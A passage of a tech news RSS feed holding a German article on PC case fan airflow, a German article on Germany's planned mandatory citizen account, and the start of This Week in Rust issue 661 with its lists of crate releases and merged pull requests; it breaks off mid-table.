<p>In den meisten Midi-Tower-Gehäusen strömt kühle Luft von vorne ins Gehäuse und soll idealerweise direkt zum CPU-Kühler gelangen. Ist der vordere obere Lüfter aber als Abluft konfiguriert, saugt er einen Teil dieser Frischluft sogleich wieder nach oben ab, bevor sie den CPU-Kühler erreicht. Der Luftstrom wird dadurch kurzgeschlossen. </p>



<p>Anstatt gezielt durch Kühlkörper und Lamellen zu fließen, verlässt die kalte Luft das Gehäuse nahezu ungenutzt. Die Folge sind höhere CPU-Temperaturen, obwohl mehrere Lüfter aktiv arbeiten. Abhilfe schafft hier eine einfache Änderung, bei der der vordere obere Lüfter nicht als Abluft, sondern als Zuluft arbeitet. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a61b254b773e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Noctua_Airflow_RGBeci.jpg?quality=50&amp;strip=all&amp;w=1012" alt="PC-Gehäuse Luftstrom" class="wp-image-3141177" width="1012" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bei der Standard-Lüfterkonfiguration für Desktop-PCs strömt kalte Luft von vorne ins PC-Gehäuse ein, trifft auf den CPU-Lüfter und entweicht nach hinten sowie oben.</p>
</figcaption></figure><p class="imageCredit">Noctua</p></div>



<p>Dadurch wird die vorne angesaugte Frischluft gezielt in Richtung CPU gedrückt, anstatt sie vorzeitig aus dem Gehäuse zu ziehen. Der hintere obere Lüfter bleibt weiterhin als Abluft konfiguriert, sodass die erwärmte Luft kontrolliert abgeführt wird. Diese Mischung aus Zu- und Abluft im Deckel widerspricht zwar älteren Faustregeln, sorgt in der Praxis aber für einen gleichmäßigeren und effizienteren Luftstrom rund um den Prozessor.</p>



<p>Ob diese Anpassung bei Ihrem System sinnvoll ist, lässt sich relativ einfach überprüfen. Öffnen Sie zunächst das Gehäuse und verschaffen Sie sich einen Überblick über die aktuelle Lüfterausrichtung. Die meisten Lüfter zeigen mit kleinen Pfeilen auf dem Rahmen an, in welche Richtung Luft strömt. Alternativ hilft ein Stück Papier oder Rauch eines Räucherstäbchens, um die Strömungsrichtung sichtbar zu machen. </p>



<p>Drehen Sie anschließend den vorderen oberen Lüfter so, dass er Luft ins Gehäuse hineinbläst, während der hintere obere Lüfter weiterhin Luft nach außen fördert. Für einen aussagekräftigen Vergleich sollten Sie die Temperaturen vor und nach der Änderung unter möglichst gleichen Bedingungen messen. </p>



<p>Starten Sie zunächst Windows, lassen Sie das System einige Minuten laufen, um es im Leerlauf zu stabilisieren, und notieren Sie die CPU-Temperatur. Danach eignen sich ein längerer Gaming-Test oder eine realistische Dauerlast, etwa durch ein anspruchsvolles Programm, besser als ein synthetischer Stresstest. Beobachten Sie dabei die durchschnittliche CPU-Temperatur über mehrere Minuten. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a61b254b7f01"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Gamemax_Case_RGBeci.jpg?quality=50&amp;strip=all" alt="Gehäuselüfter-Konfiguration" class="wp-image-3141178" width="1024" height="781" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine kleine Änderung der Gehäuselüfter-Konfiguration kann unter Umständen die Prozessortemperatur verbessern – sprich, messbar senken.</p>
</figcaption></figure><p class="imageCredit">Gamemax</p></div>



<p>In vielen Fällen lässt sich eine Absenkung um ein bis zwei Grad Celsius feststellen, gelegentlich auch mehr, abhängig von Gehäuse, Lüfterleistung sowie CPU-Kühler. Wichtig ist, dass diese Methode besonders für Systeme mit klassischem Luftkühler gilt. Wird der Prozessor über eine Wasserkühlung mit Radiator versorgt, spielt die Luftführung im Bereich des CPU-Kühlers eine andere Rolle. </p>



<p>Wenn der Radiator im Deckel sitzt, entscheidet die Lüfterausrichtung primär darüber, ob der Fokus auf niedrigeren Prozessortemperaturen oder auf einer besseren Gesamtabfuhr der Gehäusewärme liegt. Hier gibt es keine universelle Lösung, weshalb eigene Tests besonders sinnvoll sind. Ebenfalls Vorsicht ist geboten, wenn Ihr Gehäuse über zusätzliche Lüfter im Boden verfügt. </p>



<p>In derartigen Konfigurationen kann ein oberer Zuluftlüfter unerwünschte Verwirbelungen erzeugen, die warme Luft im Gehäuse halten oder die Grafikkarte stärker aufheizen. In diesen Fällen funktioniert das klassische Konzept mit Abluft im Deckel meist zuverlässiger. Die wichtigste Erkenntnis lautet daher, dass starre Regeln beim Airflow oftmals zu kurz greifen. </p>



<p>Anstatt alle oberen Lüfter reflexartig als Abluft zu konfigurieren, lohnt es sich, die tatsächliche Luftbewegung im eigenen Gehäuse zu betrachten und gezielt anzupassen.  </p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/2961245/argus-monitor-test.html" target="_blank" rel="noreferrer noopener">Argus Monitor im Test – Hardware-Temperatur immer im Blick</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bundesregierung plant Pflichtkonto für jeden Bürger: Das müssen Sie jetzt wissen]]></title>
<description><![CDATA[Die Bundesregierung setzt aktuell neue Pläne in Gang, um für jeden Bürger ein verpflichtendes Konto einzurichten. Dieses Bürgerkonto soll dabei helfen, die eigene Identität nachzuweisen, Anträge zu stellen und Informationen zu erhalten. 



Es handelt sich also nicht um ein Konto im klassischen S...]]></description>
<link>https://tsecurity.de/de/3688116/it-nachrichten/bundesregierung-plant-pflichtkonto-fuer-jeden-buerger-das-muessen-sie-jetzt-wissen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688116/it-nachrichten/bundesregierung-plant-pflichtkonto-fuer-jeden-buerger-das-muessen-sie-jetzt-wissen/</guid>
<pubDate>Thu, 23 Jul 2026 08:03:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die Bundesregierung setzt aktuell neue Pläne in Gang, um für jeden Bürger ein verpflichtendes Konto einzurichten. Dieses Bürgerkonto soll dabei helfen, die eigene Identität nachzuweisen, Anträge zu stellen und Informationen zu erhalten. </p>



<p>Es handelt sich also nicht um ein Konto im klassischen Sinne, wie bei einer Bank oder einem Online-Account (Tipp: <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Mit einem Passwort-Manager sichern Sie jedes Ihrer Konten</a>). Stattdessen möchte die Regierung ein gebündeltes Angebot schaffen, das die <a href="https://www.pcwelt.de/article/2254461/bund-id-und-portal-digitalen-verwaltung.html" target="_blank" rel="noreferrer noopener">BundID </a>weiterführt.</p>



<p><strong>Zur Erinnerung: </strong>BundID ist ein Online-Dienst der Regierung, mit dem Sie sich bereits ausweisen und wichtige Dienste wie den elektronischen Personalausweis freischalten können.</p>



<h2 class="wp-block-heading">Wofür ist das Bürgerkonto gedacht?</h2>



<p>Im Gegensatz zur BundID soll das neue Bürgerkonto aber weitaus mehr beinhalten. Damit soll es auch möglich sein, antraglos bestimmte Leistungen zu erhalten. Im <a href="https://www.koalitionsvertrag2025.de/sites/www.koalitionsvertrag2025.de/files/koav_2025.pdf" target="_blank" rel="noreferrer noopener">Koalitionsvertrag</a> der CDU, CSU und SPD hat die Regierung dazu festgehalten:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Verwaltungsprozesse müssen sich an Lebenslagen orientieren. Wir werden dabei zunehmend antragslos arbeiten. Etwa nach der Geburt eines Kindes sollen Eltern automatisch einen Kindergeldbescheid erhalten. Die Verwaltungsmodernisierung von Sozialleistungen werden wir generell zur Blaupause machen. Wir setzen auf konsequente Digitalisierung und „Digital-Only“: Verwaltungsleistungen sollen unkompliziert digital über eine zentrale Plattform („One-Stop-Shop“) ermöglicht werden, das heißt ohne Behördengang oder Schriftform. Jeder Bürger und jede Bürgerin erhält verpflichtend ein Bürgerkonto und eine digitale Identität. Wir werden die EUDI-Wallet für Bürgerinnen und Bürger und Unternehmen bereitstellen, mit der Identifikation, Authentifizierung und Zahlungen ermöglicht werden. Wer den digitalen Weg nicht gehen will oder kann, erhält Hilfe vor Ort.</p>
</blockquote>



<h2 class="wp-block-heading">Verpflichtend für alle?</h2>



<p>Spannend ist die gewählte Formulierung zur Frage, ob das Bürgerkonto verpflichtend wird oder nicht. Erst heißt es, es sei verpflichtend. Dann ergänzt die Bundesregierung aber, dass Personen, die das Konto nicht nutzen wollen oder können (beispielsweise aufgrund fehlender Mittel oder Kenntnisse), ebenfalls Optionen haben.</p>



<p>Welche Optionen das sein werden, ist noch völlig unklar. Vermutlich wird in bestimmten Ausnahmefällen eine Befreiung vom Bürgerkonto erlaubt sein. Spezielle Anpassungen für Unternehmen soll es ebenfalls geben. Bislang ist die Verwendung von BundID und anderen Services komplett freiwillig, doch das scheint sich bald zu ändern.</p>



<p>Bis jetzt gibt es aber noch keine Gesetzesvorlage, die die Nutzung des Bürgerkontos vorschreibt. Erst einmal muss es starten, wofür es aber bislang keinen zeitlichen Rahmen gibt. Einige Experten gehen aber von einem Start ab 2028 aus.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/3137244/eudi-wallet-digitaler-ausweis-deutschland.html" target="_blank" rel="noreferrer noopener">EUDI-Wallet kommt im Januar 2027: Was bringt der digitale Ausweis?</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 661]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3688059/tools/this-week-in-rust-this-week-in-rust-661/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688059/tools/this-week-in-rust-this-week-in-rust-661/</guid>
<pubDate>Thu, 23 Jul 2026 07:18:12 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/07/16/Rust-1.97.1/">Announcing Rust 1.97.1</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-76">The Embedded Rustacean Issue #76</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://tokio.rs/blog/2026-07-22-announcing-topcoat">Announcing Topcoat: a framework for building full-stack reactive web apps with Rust</a></li>
<li><a href="https://github.com/dtolnay/syn/releases/tag/3.0.0">Syn 3.0.0</a></li>
<li><a href="https://blog.jetbrains.com/rust/2026/07/22/whats-new-in-rustrover-2026-2/">What’s New in RustRover 2026.2</a></li>
<li><a href="https://github.com/kunobi-ninja/kobe/releases/tag/v0.35.0">kobe 0.35.0: readiness gates and cert recycling</a></li>
<li><a href="https://github.com/Eoin-McMahon/comhad/releases/tag/v0.1.0">Comhad v0.1.0: a ranger-style tui cyberduck replacement for browsing S3</a></li>
<li><a href="https://github.com/bigduu/Nova/releases/tag/v0.2.1">Nova v0.2.1: computer-use MCP server</a></li>
<li><a href="https://github.com/rust-windowing/winit/pull/4571">winit now has comprehensive cross-platform drag-and-drop support, exposing most of the power of the underlying OS APIs</a></li>
<li><a href="https://github.com/singhpratech/crimson-crab/releases/tag/v0.1.0">crimson-crab v0.1.0 - a production-grade Rust SDK for the Claude API (streaming, tool use, prompt caching, batches)</a></li>
<li><a href="https://singhpratech.github.io/ferrovec/">ferrovec: dependency-light HNSW vector search in Rust, compiled to WebAssembly for private in-browser semantic search</a></li>
<li><a href="https://github.com/ordokr/ordofp/releases/tag/v0.1.0">OrdoFP 0.1.0 released — a functional-programming toolbelt for Rust (HList, GAT type classes, optics, effects, monad transformers)</a></li>
<li><a href="https://freyaui.dev/posts/0.4">Freya 0.4</a></li>
<li><a href="https://dev.to/nabsei/buildline-merging-cargo-and-ninjas-build-profiling-into-one-timeline-2373">buildline: merging cargo and ninja's build profiling into one timeline</a></li>
<li><a href="https://richer-richard.github.io/cochlea/determinism.html#030-additions-2026-07-22">cochlea 0.3.0: melody read-back, MFCC timbre, a master limiter, and MIDI import for the deterministic agent-audio engine</a></li>
<li><a href="https://flodl.dev/blog/then-the-cpu-died">flodl 0.6.0: multi-host heterogeneous DDP - mismatched GPUs across hosts beat the fastest card alone</a></li>
<li><a href="https://hongnoul.github.io/hwatu/">hwatu: a daemon-based WebKitGTK browser for tiling WMs with ~13ms window spawn</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.11.0">kache 0.11.0: broader compiler coverage and libc-aware keys</a></li>
<li><a href="https://mladedav.github.io/blog/blog/tracing-reload/"><code>tracing-reload</code> - reload layer without panics</a></li>
<li><a href="https://www.opentypeless.com/en/blog/introducing-talkmore">Introducing OpenTypeless: Voice Input That Actually Works</a></li>
<li><a href="https://dev.to/booyaka101/reading-a-rust-crates-capabilities-out-of-its-compiled-symbols-58pb">Reading a Rust crate's capabilities out of its compiled symbols</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://smallcultfollowing.com/babysteps/blog/2026/07/15/battery-packs/">Battery packs: Let's talk about crates, baby</a></li>
<li><a href="https://blog.yoshuawuyts.com/capture-clauses-as-effects">Capture Clauses as Effects</a></li>
<li><a href="https://corrode.dev/blog/hardening-rust/">Hardening Rust Code For Production</a></li>
<li><a href="https://pranitha.dev/posts/tokio-gives-progress-not-ordering/">Tokio Gives Progress, Not Ordering: Scheduling 1M Tasks</a></li>
<li><a href="https://kerkour.com/rust-service-hardening-and-production-checklist">Rust service hardening and production checklist</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e08-rust-foundation/">The Rust Foundation with Rebecca Rumbul, Lori Lorusso, and David Wood, Rust Foundation leadership and board</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=bAINppA0BSU">Jon Gjengset: Open Source Maintenance 2026-07-18</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=lUoQ3uGSQA0">Rust Release Changelog - 1.97.0</a></li>
<li>[video] <a href="https://www.youtube.com/live/Doqwh1b4QyA">Livestream: Rust in Ubuntu</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://kriyanative.com/blog/13-chain-breaks/">I hash-chained my agent's audit log. Then I found 13 breaks in it — all mine, all benign.</a></li>
<li><a href="https://dev.to/scripthpp/two-bugs-i-only-found-by-running-my-rust-sync-daemon-against-real-infrastructure-4278">Two tricky bugs in a Rust daemon</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=u91eX3J6lPU">Backend Concepts in Rust: Securely Managing App Secrets</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=tIrSvJFRxAg">Build with Naz - Ep 21: High Performance Flat 2D Arrays in Rust (SIMD, L1 cache)</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/medialab/xan">xan</a>, a TUI toolkit to work with CSV files.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1630">Simeon H.K. Fitch</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>



<ul>
<li><em>No Calls for participation were submitted this week.</em></li>
</ul>
<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>


<ul>
<li><em>No Calls for papers or presentations were submitted this week.</em></li>
</ul>
<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>576 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-07-14..2026-07-21">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159256">account for async closures when pointing at lifetime in return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157824">comptime inherent impls</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159115"><code>dep_graph</code>: deduplicate task reads with an epoch-filtered index recorder</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158976">eagerly check for ambiguity in macro parsing</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158608">implement <code>#[diagnostic::opaque]</code> attribute to hide backtraces of macros</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158720">shrink <code>ast::Expr64</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159467">add explicit <code>Iterator::count</code> impl for <code>str::EncodeUtf16</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159296">implement <code>bool::toggle</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159528">implement <code>const_binary_search</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159302">implement <code>Debug</code> helpers via <code>Cell</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156220">implement <code>VecDeque::truncate_to_range</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158061">make <code>pin!()</code> more foolproof</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158546">move <code>std::io::BufRead</code> to <code>alloc::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158544">move <code>std::io::Read</code> to <code>alloc::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158545">move <code>std::io::read_to_string</code> to <code>alloc::io</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159149">use PGO for Cargo</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17238"><code>timings</code>: only report units the job queue actually ran</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17236">do not include proc-macro deps in rustc search path args</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17216">include SBOM outputs in fingerprints</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17226">lazily initialize git2 fetch transports</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159194">fix auto trait normalization env</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159091">use PGO for rustdoc</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16855">add <code>block_scrutinee</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17415">avoid invalid <code>ref_as_ptr</code> suggestions in const/static initializers</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16800">detect <code>== 0</code> on unsigned types as a <code>manual_clamp</code> lower bound</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17405">fix <code>if_not_else</code> linting on macro expanded conditions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17383">fix <code>needless_collect</code> suggests a suggestion that cannot be typed</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17385"><code>non_zero_suggestions</code>: don't lint signed integer div/rem as NonZero</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17377"><code>manual_filter</code>: don't eat comments in the <code>and_then</code> suggestion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17369">require the use of <code>as _</code> for indirectly used traits in clippy sources</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17362">rewrite <code>min_ident_chars</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16633">use <code>#[must_use]</code> determination from the compiler</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22634">avoid index panic when flycheck list is empty</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22811">add capture hints to coroutines</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22813">add handler for E0572</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22483">do not assume array destructuring assignments with rest pattern are constant-sized</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22852">eagerly normalize <code>.await</code>'s <code>IntoFuture::Output</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22791">enable auto trait inference</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22792">extract variable preserving whitespace from macro input</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22832">fix coroutines not recording binding owners correctly</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22759">fix crashes in assists due to <code>.unwrap()</code> calls in SyntaxFactory</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22810">fix <code>hir</code> crate leaking bound variables from skipped binders</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22855">fix <code>InferenceContext:identity_args</code> using the wrong DefId</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22849">fix syntax bridge panic when spilting float</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22857">handle <code>enum</code> variants in next-solver <code>generics</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22818">implement lowering of HRTB</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22789">invalid <code>pattern_matching_variant</code> lowering due to recovery</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22867">merge <code>WherePredicate::ForLifetimes</code> into <code>WherePredicate::TypeBound</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22804">only write anon const ty in parent's inference result if it doesn't have its own inference</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22822">panic with a function item and a proc macro item having a duplicate name</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22827">parser to error on macro type bound</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22865">spawn proc-macro servers on requests clearing the client cache</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22782">use quote! inside <code>ast::make::expr_call()</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22793">use <code>Result</code> for the lsp-server <code>Response</code> payload type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22861">record expressions in types in <code>ExprScope</code></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>The two most notable changes this week were <a href="https://github.com/rust-lang/rust/pull/159115">#159115</a>,
which resulted in pretty nice instruction count wins for full incremental builds on several benchmarks,
and <a href="https://github.com/rust-lang/rust/pull/159091">#159091</a>, which enabled PGO for rustdoc, which
makes it ~3-4% faster across the board.</p>
<p>There were two large rollups with tiny performance regressions, which made it difficult to find
the offending PRs.</p>
<p>Triage done by <strong>@Kobzol</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=5503df87342a73d0c29126a7e08dc9c1255c46ad&amp;end=d527bc9bfa297ca7fd7f5ae93781eeec42073170&amp;absolute=false&amp;stat=instructions%3Au">5503df87..d527bc9b</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
